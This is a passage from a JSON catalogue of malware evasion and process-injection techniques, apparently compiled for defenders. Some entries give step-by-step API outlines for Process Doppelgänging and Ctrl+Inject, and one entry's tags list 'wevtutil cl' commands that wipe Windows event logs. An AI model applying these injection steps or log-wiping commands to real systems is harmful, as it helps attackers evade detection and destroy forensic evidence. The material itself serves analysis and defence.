"description": "Image File Execution Options Injection, also known as IFEO Injection, is a technique used by malware to evade detection and persist on a compromised system. \r\n\r\nThe technique involves modifying the Image File Execution Options (IFEO) registry key, which is used by the Windows operating system to set debugging options for executable files. When an executable file is launched, the operating system checks the corresponding IFEO registry key for any specified debugging options. If the key exists, the operating system launches the specified debugger instead of the executable file. \r\n\r\nAlong with IFEO, malware also uses other registry keys such as `Appinit_DLL` and `AppCertDlls` for both injection and persistence on the compromised system. These keys are used by the operating system to load DLLs at the start of a process and for code signing, respectively.",
"resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"creation_date": "2019-03-23T17:19:27Z",
"tags": "Image File Execution Options Injection, IFEO Injection, malware, evasion, detection, persistence, compromised system, registry keys, Windows operating system, debugging options, executable files, Appinit_DLL, AppCertDlls, injection, DLLs, code signing,de signing,",
"modification_date": "2023-10-04T10:44:02.397000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
331
],
"contributors": []
},
{
"id": 113,
"key": "apc-injection",
"unprotect_id": "U1221, E1055.004",
"name": "APC injection",
"description": "Malware can take advantage of Asynchronous Procedure Calls (APC) to force another thread to execute their custom code by attaching it to the APC Queue of the target thread.\r\n\r\nEach thread has a queue of APCs which are waiting for execution upon the target thread entering alterable state.\r\n\r\nA thread enters an alert table state if it calls `SleepEx`, `SignalObjectAndWait`, `MsgWaitForMultipleObjectsEx`, `WaitForMultipleObjectsEx`, or `WaitForSingleObjectEx` functions. The malware usually looks for any thread that is in an alterable state, and then calls `OpenThread` and `QueueUserAPC` to queue an APC to a thread.",
"resources": "",
"creation_date": "2019-03-23T17:21:25Z",
"tags": "Asynchronous Procedure Calls (APC), custom code, APC Queue, target thread, alterable state, SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, WaitForSingleObjectEx, OpenThread, QueueUserAPC, Malware, thread, execution",
"modification_date": "2023-10-04T10:39:04.584000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
132,
239,
290,
295,
381,
399,
419
],
"contributors": []
},
{
"id": 114,
"key": "atom-bombing",
"unprotect_id": "U1220",
"name": "Atom Bombing",
"description": "Atom Bombing is a technique that utilizes Windows Atom Tables, which provide a global storage mechanism for strings, to inject malicious code into a target process. \r\n\r\nThe technique involves storing a shellcode in an Atom Table, then using the `NtQueueApcThread` function to force the targeted process to access the specific Atom, causing the injection to occur. To bypass Data Execution Prevention (DEP), the technique also employs Return Oriented Programming (ROP) chains. \r\n\r\nAtom Bombing is a form of process injection that abuses legitimate Windows functions to store and execute malicious code in a target process.",
"resources": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows",
"creation_date": "2019-03-23T17:22:37Z",
"tags": "Atom Bombing, Process injection, Windows functions, Atom Tables, Globally accessible string storage, shellcode, NtQueueApcThread, targeted process, Return Oriented Programming (ROP), Data Execution Prevention (DEP), injection, malicious code, Windows Atom Tables, global storage mechanism,",
"modification_date": "2023-10-04T10:42:35.764000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
6,
7,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
338,
339,
340,
357,
365,
381,
383,
395,
399,
412,
415,
419,
425,
439,
444,
449,
532
],
"contributors": []
},
{
"id": 115,
"key": "extra-window-memory-injection",
"unprotect_id": "U1219, E1055.011",
"name": "Extra Window Memory Injection",
"description": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). \r\n\r\nRegistration of new windows classes can include a request for up to 40 bytes of Extra Window Memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.\r\n\r\nAdversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.",
"resources": "https://www.crowdstrike.com/blog/through-window-creative-code-invocation/\nhttps://modexp.wordpress.com/2018/08/26/process-injection-ctray/",
"creation_date": "2019-03-23T17:26:37Z",
"tags": "EWMI, Code Injection",
"modification_date": "2023-10-04T10:43:53.882000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
357,
363,
425
],
"contributors": []
},
{
"id": 116,
"key": "injection-using-shims",
"unprotect_id": "U1218, E1055.m03",
"name": "Injection using Shims",
"description": "Microsoft provides Shims to developers mainly for backward compatibility. Shims allow developers to apply fixes to their programs without the need of rewriting code. By leveraging shims, developers can tell the operating system how to handle their application. Shims are essentially a way of hooking into APIs and targeting specific executables. Malware can take advantage of shims to target an executable for both persistence and injection. Windows runs the Shim Engine when it loads a binary to check for shimming databases in order to apply the appropriate fixes.",
"resources": "https://www.andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nhttps://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf",
"creation_date": "2019-03-23T17:27:38Z",
"tags": "shims",
"modification_date": "2023-10-04T10:44:28.934000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
7,
381,
425
],
"contributors": []
},
{
"id": 117,
"key": "iat-hooking",
"unprotect_id": "U1217, F0015.003",
"name": "IAT Hooking",
"description": "IAT hooking is a way to run malicious code by modifying the Import Address Table of a specific executable. Consisting of replacing one legitimate function from imported DLL by a malicious one. \r\n\r\nIAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. When a legitimate application calls an API located in a DLL, the replaced function is executed instead of the original one. In contrast, with inline hooking, malware modifies the API function itself.",
"resources": "https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108",
"creation_date": "2019-03-23T17:28:15Z",
"tags": "iat",
"modification_date": "2023-10-04T10:42:26.592000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
7,
249
],
"contributors": []
},
{
"id": 118,
"key": "pe-injection",
"unprotect_id": "U1216, E1055.002",
"name": "PE Injection",
"description": "Instead of passing the address of the LoadLibrary, malware can copy its malicious code into an existing open process and force it to execute (either via a small shellcode, or by calling `CreateRemoteThread`).\r\n\r\nOne advantage of PE injection over the `LoadLibrary` technique is that the malware does not have to drop a malicious DLL on the disk. The malware allocates memory in a host process (e.g. `VirtualAllocEx`), and instead of writing a “DLL path” it writes its malicious code by calling `WriteProcessMemory`. However, the obstacle with this approach is the change of the base address of the copied image.\r\n\r\nWhen a malware injects its PE into another process it will have a new base address which is unpredictable, requiring it to dynamically recompute the fixed addresses of its PE. To overcome this, the malware needs to find its relocation table address in the host process and resolve the absolute addresses of the copied image by looping through its relocation descriptors.",
"resources": "http://blog.sevagas.com/?PE-injection-explained",
"creation_date": "2019-03-23T17:30:20Z",
"tags": "",
"modification_date": "2023-10-04T10:42:59.673000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
1,
3,
4,
6,
23,
24
],
"contributors": []
},
{
"id": 119,
"key": "process-doppelganging",
"unprotect_id": "U1215",
"name": "Process Doppelgänging",
"description": "This technique leverages the `Transactional NTFS` functionality in Windows. This functionality helps maintain data integrity during an unexpected error. For example, when an application needs to write or modify a file, if an error is triggered mid-write, the data can be corrupted. To avoid this kind of behavior, an application can open the file in a transactional mode to perform the modification, then commit the modification, avoiding any corruption. The modification either completes successfully or does not begin.\r\n\r\nProcess Doppelgänging abuses this functionality to overwrite a legitimate file with a malicious file, resulting in a process injection. The malicious file will be created inside a transaction then committed to the legitimate file, then executed.\r\n\r\nHere are the detailed steps to reproduce the Process Doppelgänging technique:\r\n\r\n1. Create a new transaction object using `NtCreateTransaction` and store the handle in `hTransaction`.\r\n\r\n2. Open the target file for the transaction using `CreateFileTransacted` and store the handle in `hTransactedFile`.\r\n\r\n3. Open the payload file using `CreateFile` and store the handle in hFile.\r\n\r\n4. Query the size of the payload file using `GetFileSizeEx` and store the result in `fsz`.\r\n\r\n5. Allocate a buffer for the payload file using `NtAllocateVirtualMemory` and store the pointer in Buffer.\r\n\r\n6. Read the payload file into the buffer using `ReadFile`.\r\n\r\n7. Close the handle to the payload file.\r\n\r\n8. Set the size of the target file using `SetFileInformationByHandle` and the `FileEndOfFileInfo` structure.\r\n\r\n9. Map the target file into memory using `NtMapViewOfSection` and store the result in `MemoryPtr`.\r\n\r\n10. Copy the payload file from the buffer into the mapped memory using `RtlCopyMemory`.\r\n\r\n11. Unmap the target file from memory using `NtUnmapViewOfSection`.\r\n\r\n12. Commit the transaction using `NtCommitTransaction`.\r\n\r\n13. Create a new process using `NtCreateUserProcess` and store the handle in `hProcess`.\r\n\r\n14. Allocate memory for the process parameters using `NtAllocateVirtualMemory` and store the result in `ProcessParameters`.\r\n\r\n15. Set the process parameters using `RtlCreateProcessParametersEx`.\r\n\r\n16. Create the process using `NtCreateSection` and `NtMapViewOfSection`.\r\n\r\n17. Start the process using `NtCreateThreadEx` and store the handle in `hThread`.\r\n\r\n18. Wait for the process to finish execution using `WaitForSingleObject`.\r\n\r\n19. Close the handle to the process and thread.",
"resources": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf",
"creation_date": "2019-03-23T17:31:06Z",
"tags": "Transactional NTFS, Windows, data integrity, write, modify file, unexpected error, transactional mode, commit, process injection, malicious file, legitimate file,",
"modification_date": "2023-10-04T10:45:01.173000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
2,
13,
16,
23,
364,
380,
388,
450
],
"contributors": []
},
{
"id": 120,
"key": "propagate",
"unprotect_id": "U1214",
"name": "Propagate",
"description": "This technique involves modifying the internal properties of a window in order to intercept and modify or monitor the behavior of the window when it receives messages. To do this, an application creates a buffer containing shellcode and injects it into the target process. \r\n\r\nThen, it modifies the internal structure used by the specific properties, such as UxSubclassInfo and CC32SubclassInfo, to point to the payload. \r\n\r\nFinally, the application modifies the property of the window. When a message is sent to the window, the shellcode is executed. This technique is known as Window Subclassing and is often used by adversaries to achieve persistence or execute malicious code.",
"resources": "http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/",
"creation_date": "2019-03-23T17:32:45Z",
"tags": "Window Subclassing, Windows functionality, internal structure, UxSubclassInfo, CC32SubclassInfo, shellcode, target process, payload, message, injection",
"modification_date": "2023-10-04T10:42:30.209000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
290
],
"contributors": []
},
{
"id": 121,
"key": "ctrlinject",
"unprotect_id": "U1213",
"name": "Ctrl+Inject",
"description": "The \"Control Signal Handler Callback\" technique involves injecting malicious code into a process by using a callback function for control signal handlers. When a control signal, such as Ctrl+C, is received by a process, the system creates a new thread to execute a function to handle the signal. This thread is typically created by the legitimate process \"csrss.exe\" in the system, making it more difficult to detect the injected code.\r\n\r\nTo successfully implement this technique, it is necessary to bypass certain Windows protections such as Pointer Encoding and Control Flow Guard. Pointer encoding is used to protect against pointer corruption, and the technique involves reproducing the encoding to appear legitimate. Control Flow Guard is a security mechanism that prevents memory corruption, such as buffer overflow, and the technique uses the API `SetProcessValidCallTargets` to validate the call target. By triggering a control signal, the injected code is executed.\r\n\r\nHere is a general outline of the process of injecting code using control signal handlers and callback functions:\r\n\r\n1. Determine the address of the callback function for control signals in the target process.\r\n\r\n2. Create a trampoline function that will be used to execute the original code from the callback function after the injection has been applied.\r\n\r\n3. Calculate the relative address of the trampoline function and store it in a jump instruction.\r\n\r\n4. Overwrite the callback function with the jump instruction and the address of the injected code.\r\n\r\n5. Modify the injected code to transfer control back to the trampoline function after executing the desired processing.\r\n\r\n6. Trigger a control signal, such as Ctrl+C, in the target process to execute the injected code.",
"resources": "https://blog.ensilo.com/ctrl-inject",
"creation_date": "2019-03-23T17:34:01Z",
"tags": "callback function, control signal, process, system, thread, csrss.exe, detection, injection, code, console process, pointer encoding, Control Flow Guard, memory corruption, buffer overflow, SetProcessValidCallTargets",
"modification_date": "2023-10-04T10:43:59.300000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
419
],
"contributors": []
},
{
"id": 122,
"key": "com-hijacking",
"unprotect_id": "U1212",
"name": "COM Hijacking",
"description": "COM hijacking is a technique used by adversaries to insert malicious code into the Windows operating system through the Microsoft Component Object Model (COM). \r\n\r\nCOM is a system that allows software components to interact with each other, and adversaries can abuse this system to execute their own code in place of legitimate software. To achieve this, they alter references and relationships in the COM system by modifying the Windows Registry. Specifically, they replace a reference to a legitimate system component with a reference to their own malicious code. \r\n\r\nWhen the legitimate component is executed through normal system operation, the adversary's code is executed instead. This can provide a means for the adversary to achieve persistence, as they can choose to hijack objects that are used frequently enough to maintain a consistent level of persistence. However, they must be careful not to break noticeable functionality within the system, as this could cause system instability and potentially lead to detection.",
"resources": "https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com",
"creation_date": "2019-03-23T17:34:46Z",
"tags": "Microsoft Component Object Model (COM),\r\nsoftware components,\r\ninteraction,\r\nWindows operating system,\r\npersistence,",
"modification_date": "2023-10-04T10:43:57.166000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
331,
469
],
"contributors": []
},
{
"id": 123,
"key": "lolbins",
"unprotect_id": "U1004",
"name": "LOLbins",
"description": "A lolbin (short for \"Living Off the Land Binaries\") is a legitimate Windows utility that can be used by adversaries to execute arbitrary commands. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, the Program Compatibility Assistant (pcalua.exe) and components of the Windows Subsystem for Linux (WSL) are examples of lolbins that can be used for this purpose.\r\n\r\nAdversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.",
"resources": "https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599\nhttps://lolbas-project.github.io/",
"creation_date": "2019-03-23T17:37:57Z",
"tags": "lolbin,\r\nWindows utilities,\r\nexecute commands,\r\nProgram Compatibility Assistant (pcalua.exe),\r\nWindows Subsystem for Linux (WSL),\r\nCommand-Line Interface,",
"modification_date": "2023-10-04T10:44:58.518000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 124,
"key": "inline-hooking",
"unprotect_id": "U1211, F0015.002",
"name": "Inline Hooking",
"description": "Inline hooking is a technique used to intercept calls to target functions. It is commonly used by antiviruses, sandboxes, and malware to perform a variety of tasks, such as checking parameters, shimming, logging, spoofing returned data, and filtering calls.\r\n\r\nThe process of inline hooking involves directly modifying the code within the target function, usually by overwriting the first few bytes with a jump instruction to redirect execution to a different function. This allows processing to be performed before or after the target function executes. Rootkits often use hooks to modify data returned from system calls to hide their presence, while security software uses them to prevent or monitor potentially malicious operations.\r\n\r\nThe hooks are placed by directly modifying code within the target function (inline modification), usually by overwriting the first few bytes with a jump; this allows execution to be redirected before the function does any processing. Most hooking engines use a 32-bit relative jump (opcode 0xE9), which takes up five bytes of space.\r\n\r\nHere is a general outline of the process of implementing an inline hook:\r\n\r\n1. Determine the address of the target function and the code that needs to be replaced.\r\n\r\n2. Create a trampoline function that will be used to execute the original code from the target function after the hook has been applied.\r\n\r\n3. Calculate the relative address of the trampoline function and store it in a jump instruction.\r\n\r\n4. Overwrite the first few bytes of the target function with the jump instruction.\r\n\r\n5. Modify the hook function to transfer control back to the trampoline function after performing the desired processing.",
"resources": "http://www.binaryguard.com/bgc/malware/sandbox/2015/11/09/dissecting_inline_hooks.html",
"creation_date": "2019-03-23T17:39:46Z",
"tags": "Inline hooking,\r\nIntercept calls,\r\nTarget functions,\r\nCheck parameters,\r\nShim,\r\nLog,\r\nSpoof returned data,\r\nFilter calls,\r\nRootkits,",
"modification_date": "2023-10-04T10:44:59.702000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
340,
425
],
"contributors": []
},
{
"id": 125,
"key": "nop-sled",
"unprotect_id": "U0206",
"name": "NOP Sled",
"description": "In computer security, a NOP slide is a sequence of NOP (no-operation) instructions that is inserted at the beginning of a code section. When a program branches to the start of this code section, it will \"slide\" through the NOP instructions until it reaches the desired, final destination. This technique is commonly used in software exploits to direct program execution when the target of a branch instruction is not known precisely.\r\n\r\nFor example, suppose an attacker has found a buffer overflow vulnerability in a program and wants to exploit it to execute arbitrary code. They might insert a NOP slide at the start of the buffer, followed by the code they want to execute. When the program overflows the buffer and branches to the start of the buffer, it will slide through the NOP instructions until it reaches the attacker's code, which will then be executed.\r\n\r\nThe NOP slide technique can be used in conjunction with shellcode to create more effective exploits. Shellcode is a small piece of code that is used as the payload in a software exploit. It typically contains the instructions needed to perform a specific action, such as spawning a shell, creating a network connection, or injecting code into another process.\r\n\r\nTo use a NOP slide with shellcode, the attacker would first insert a NOP sequence at the start of the code section they are targeting. They would then insert their shellcode after the NOP sequence, so that it is located at the final, desired destination. When the program branches to the start of the code section, it will slide through the NOP instructions until it reaches the shellcode, which will then be executed.\r\n\r\nUsing a NOP slide with shellcode can help to make exploits more reliable, as it provides a \"buffer\" of NOP instructions that can help to align the program's execution flow with the shellcode. This can help to prevent the exploit from failing due to small variations in the branch target address. It can also make it more difficult for defenses to detect and block the exploit, as the NOP instructions can help to obscure the shellcode.\r\n\r\nNOP slides are a simple but effective technique for directing program execution in situations where the exact branch target is not known. They can also be used in conjunction with other exploit techniques, such as return-oriented programming, to create more complex and powerful exploits.",
"resources": "https://silviocesare.wordpress.com/2009/05/13/removing-semantic-nops-from-malware/",
"creation_date": "2019-03-23T17:46:42Z",
"tags": "NOP sled,\r\nNOP ramp,\r\nNOP padding,\r\nNOP sequence,\r\nNOP-based execution,\r\nInstruction padding,\r\nCode slide,\r\nBuffer overflow,\r\nReturn-oriented programming,\r\nExploit mitigation,\r\nShellcode execution,",
"modification_date": "2023-10-04T10:42:28.303000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [
3,
340
],
"contributors": []
},
{
"id": 126,
"key": "call-trick",
"unprotect_id": "U0205",
"name": "Call Trick",
"description": "The call trick is an anti-disassembling technique that involves modifying the default function's return address. This can be used in conjunction with other techniques, such as the insertion of garbage bytes, to break disassemblers. Disassemblers that use recursive traversal or linear sweep may be particularly vulnerable to this trick, as they may be unable to accurately interpret the next instruction after the call, making them susceptible to other anti-disassembly techniques.",
"resources": "https://media.blackhat.com/bh-us-12/Briefings/Branco/BH_US_12_Branco_Scientific_Academic_WP.pdf",
"creation_date": "2019-03-23T17:49:41Z",
"tags": "Call trick, Return address modification, Anti-disassembling, Garbage bytes, Disassembler evasion, Function call interception,\r\nRecursive traversal disassembly,\r\nLinear sweep disassembly,",
"modification_date": "2023-10-04T10:44:42.438000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 127,
"key": "inserting-garbage-bytes",
"unprotect_id": "U0204, B0032.007",
"name": "Inserting Garbage Bytes",
"description": "Garbage bytes are random or meaningless data that is inserted into a program's code in order to make reverse engineering and analysis more difficult. This is an anti-disassembling technique, as the insertion of these random bytes can cause disassemblers to misinterpret the code and produce incorrect disassembly results.\r\n\r\nThe insertion of garbage bytes is usually used in conjunction with other techniques, such as code transposition or register reassignment. This can make the code even harder to analyze and understand, as the disassembler will not only have to deal with the incorrect disassembly caused by the garbage bytes, but also with the other obfuscation techniques that are being used.\r\n\r\nThe goal of this technique is to make it more difficult for a reverse engineer or disassembler to understand the code's behavior and intentions. By inserting random or meaningless data into the code, the disassembler will be unable to accurately reconstruct the original program, making it harder to analyze and understand.",
"resources": "https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material/documents/static-analysis-of-artefacts-toolset.pdf",
"creation_date": "2019-03-23T17:52:32Z",
"tags": "Random data, Meaningless data,\r\nCode obfuscation,\r\nCode transposition,\r\nRegister reassignment,\r\nCode confusion,\r\nObfuscated code,",
"modification_date": "2023-10-04T10:42:53.166000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 128,
"key": "register-reassignment",
"unprotect_id": "U0203",
"name": "Register Reassignment",
"description": "Register reassignment is a technique used in code obfuscation and anti-disassembling to make reverse engineering and analysis more difficult. It involves modifying the instructions in a program to use different registers in different versions or instances of the program. This can make it more difficult for a reverse engineer or disassembler to understand the program's behavior, as the register assignments may not be immediately apparent or may change over time.\r\n\r\nThis technique is often used in malware to evade detection and analysis by security tools, as it can make the code more complex and less predictable. By switching registers in different versions of the code, the malware can evade signature-based detection techniques and make it more difficult for analysts to understand and analyze the code.",
"resources": "https://sensorstechforum.com/advanced-obfuscation-techniques-malware/",
"creation_date": "2019-03-23T18:00:09Z",
"tags": "Code obfuscation, Register modification, Code complexity, Signature evasion",
"modification_date": "2023-10-04T10:42:32.974000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 129,
"key": "code-transposition",
"unprotect_id": "U0202",
"name": "Code Transposition",
"description": "Code transposition is a technique used by malware authors to evade detection and analysis by rearranging the instructions of a piece of code without changing its behavior. This technique is used to make the code more difficult to read and understand for disassemblers and reverse engineers, as well as to hide the true intent of the code.\r\n\r\nThere are two main methods of implementing code transposition. The first method involves the use of a random number generator to randomly rearrange the instructions of the code. This makes it difficult for analysts to determine the original order of the instructions, and can make the code difficult to follow and understand.\r\n\r\nThe second method of code transposition involves the use of a mathematical function to rearrange the instructions in a predictable and consistent manner. This allows the code to be easily transposed back to its original form if necessary, but still makes it difficult for analysts to follow and understand the code.\r\n\r\nOverall, code transposition is a technique used by malware authors to make their code more difficult to analyze and understand, and to evade detection by security tools and analysts.",
"resources": "https://sensorstechforum.com/advanced-obfuscation-techniques-malware/",
"creation_date": "2019-03-23T18:01:30Z",
"tags": "Instruction reordering, Anti-disassembling, Obfuscation, Code rearrangement, Random number generator, Mathematical function, Code complexity",
"modification_date": "2023-10-04T10:44:38.164000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 130,
"key": "opaque-predicate",
"unprotect_id": "U0201,B0032.019",
"name": "Opaque Predicate",
"description": "Opaque predicate is a term used in programming to refer to decision making where there is only one possible outcome. This can be achieved through the use of complex or hard-to-understand logic, such as calculating a value that will always return True. \r\n\r\nOpaque predicates are often used as anti-disassembling techniques, as they can make it difficult for an analyst to understand the code and determine its intent. By using opaque predicates, malware authors can make their code more difficult to reverse engineer, which can help to evade detection and analysis.",
"resources": "https://www.carbonblack.com/2019/02/25/defeating-compiler-level-obfuscations-used-in-apt10-malware/",
"creation_date": "2019-03-23T18:03:47Z",
"tags": "Complex logic, Hard-to-understand code, Single-path decision making, Always-true conditions, Anti-disassembling, Reverse engineering evasion, Malware detection evasion",
"modification_date": "2023-10-04T10:44:19.865000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 131,
"key": "kill-process",
"unprotect_id": "U0403",
"name": "Kill Process",
"description": "Malware often employs techniques to evade detection and hinder the efforts of security experts in analyzing its behavior. One notable method involves terminating processes associated with anti-virus software or monitoring tools.\r\n\r\nFor example, malware may specifically target processes like wireshark.exe, ida.exe, or procmon.exe, which are frequently used by analysts to observe and scrutinize running processes on a system. By terminating these processes, malware effectively obstruct security experts from acquiring insight into its operations and impedes their ability to analyze its inner workings.",
"resources": "https://www.bleepingcomputer.com/news/security/coinminer-comes-with-a-process-kill-list-to-keep-competitors-at-bay/",
"creation_date": "2019-03-23T18:09:35Z",
"tags": "Wireshark.exe,\r\nKill process,\r\nIda.exe,\r\nProcmon.exe,\r\nDisrupt,\r\nmonitoring",
"modification_date": "2023-10-04T10:43:58.020000Z",
"category": [
6
],
"rules": [
35,
36,
46
],
"attachments": [],
"featured_api": [
23,
24,
26,
27,
28,
425
],
"contributors": []
},
{
"id": 133,
"key": "indicator-removal-clear-windows-event-logs",
"unprotect_id": "T1070.001,U0302",
"name": "Indicator Removal: Clear Windows Event Logs",
"description": "Event logging is a process that records important software and hardware events from various sources and stores them in a centralized location called an event log. This service is commonly used by applications and operating systems to track and troubleshoot issues, and can be a valuable tool for forensic investigations.\r\n\r\nEvent logs can provide valuable information about the actions taken by an attacker during a security breach, including the time and date of the attack, the source of the attack, and any changes made to the system. However, attackers may attempt to delete or clear event logs to conceal their actions and evade detection.\r\n\r\nForensic investigators can look for signs of event log tampering by checking for the presence of event clear ID 1102, which indicates that the audit log has been cleared. This can be an indication that an attacker has attempted to cover their tracks.",
"resources": "https://0x00sec.org/t/anti-forensic-and-file-less-malware/10008#221-disabling-event-logging\nhttps://attack.mitre.org/techniques/T1070/001/\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102",
"creation_date": "2019-03-23T18:23:34Z",
"tags": "Defense Evasion\r\nevent, \r\nlog,\r\nwevtutil cl system,\r\nwevtutil cl application,\r\nwevtutil cl security,\r\nwipe logs,\r\nAPT28,\r\nAPT32,\r\nAPT38,\r\nAPT41,",
"modification_date": "2023-10-04T10:44:13.015000Z",
"category": [
8,
10
],
"rules": [
11,
12
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 134,
"key": "wiping-or-encrypting",
"unprotect_id": "U0301",
"name": "Wiping or Encrypting",
"description": "Anti-forensic techniques are methods used by malware to prevent security professionals from detecting and analyzing it. One way that malware can accomplish this is by using wiping or encryption techniques to remove its own trace from the system. \r\n\r\n In some cases, malware may use wiping or encryption as a decoy, in order to distract security professionals and hide its true purpose. In other cases, it may use these techniques as part of a sabotage operation, in order to destroy data or cause other damage to the system. \r\n\r\nOverall, wiping and encryption techniques are just one of the many anti-forensic techniques that malware can use to evade detection and cause harm to computer systems.",
"resources": "https://securingtomorrow.mcafee.com/business/pseudo-ransomware-killdisk-creates-smoke-screen-cybercriminals/",
"creation_date": "2019-03-23T18:25:05Z",
"tags": "Wiping,\r\nEncryption,\r\nAnti-forensic,\r\nSabotage,\r\nEvade detection,",
"modification_date": "2023-10-04T10:44:54.107000Z",
"category": [
8
],
"rules": [
21,
42
],
"attachments": [],
"featured_api": [
23,
450
],
"contributors": []
},
{
"id": 135,
"key": "hiding-mechanisms",
"unprotect_id": "U1003",
"name": "Hiding Mechanisms",
"description": "Malware often uses various techniques to hide its presence on a system and avoid detection. One common method is to modify or create entries in the system registry, which is a database of configuration settings for the operating system and installed applications. By modifying these settings, malware can hide itself from security software or other programs that might detect its presence.\r\n\r\nAnother technique is to modify or create critical system files, such as system DLLs or driver files. This can allow the malware to gain access to system resources and remain hidden from security software. Similarly, malware can hide itself in temporary folders or other locations on the system that are not routinely scanned for malicious activity. By using these and other techniques, malware can avoid detection and continue to operate on a compromised system.",
"resources": "https://www.cimcor.com/blog/5-places-ransomware-and-malware-can-hide-that-you-may-never-check",
"creation_date": "2019-03-23T18:28:07Z",
"tags": "hide presence,\r\nsystem registry,\r\ncritical system files,\r\ntemporary folders,\r\noperating system,\r\ninstalled applications,",
"modification_date": "2023-10-04T10:42:30.466000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [
331
],
"contributors": []
},
{
"id": 136,
"key": "ntfs-files-attributes",
"unprotect_id": "U0501",
"name": "NTFS Files Attributes",
"description": "Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes and Data known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files. \r\n\r\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.",
"resources": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/",
"creation_date": "2019-03-23T18:30:15Z",
"tags": "ntfs",
"modification_date": "2023-10-04T10:42:32.579000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [
23,
380,
381,
425,
450
],
"contributors": []
},
{
"id": 137,
"key": "fast-flux",
"unprotect_id": "U0907",
"name": "Fast Flux",
"description": "Fast flux is a technique used by botnets to conceal the location of their phishing and malware delivery sites by using a constantly changing network of compromised hosts as proxies. This makes it difficult for law enforcement and other security actors to track down and shut down the sites, as the IP addresses of the sites are constantly changing.\r\n\r\nFast flux is often used in combination with other techniques, such as peer-to-peer networking, distributed command and control, web-based load balancing, and proxy redirection, to make the botnet more resilient to detection and countermeasures. By using these techniques together, the botnet can maintain a high level of operational security and evade detection by security systems.",
"resources": "https://unit42.paloaltonetworks.com/fast-flux-101/",
"creation_date": "2019-04-23T11:54:27Z",
"tags": "Fast flux,\r\nDNS technique,\r\nBotnets,\r\nPhishing,\r\nMalware delivery sites,\r\nCompromised hosts,\r\nProxies,\r\nPeer-to-peer networking,",
"modification_date": "2023-10-04T10:44:37.725000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 138,
"key": "domain-generation-algorithm",
"unprotect_id": "U0906, B0031",
"name": "Domain Generation Algorithm",
"description": "Domain generation algorithms (DGAs) are algorithms used by malware to generate a large number of domain names that can be used as communication channels with their command and control servers. These domain names are generated periodically, typically using a pseudorandom number generator.\r\n\r\nThe use of DGAs makes it difficult for law enforcement and other security actors to shut down botnets, as infected computers will attempt to contact some of these domain names every day to receive updates or commands. The use of public-key cryptography in the malware code also makes it difficult to mimic commands from the malware controllers.\r\n\r\nDGAs are commonly used by malware families such as Zeus, Andromeda, and Necurs to establish communication channels that are hard to detect and disrupt. This allows the malware to receive instructions from the attackers and carry out various malicious activities, such as stealing sensitive information, spreading to other devices, or launching attacks on other systems.",
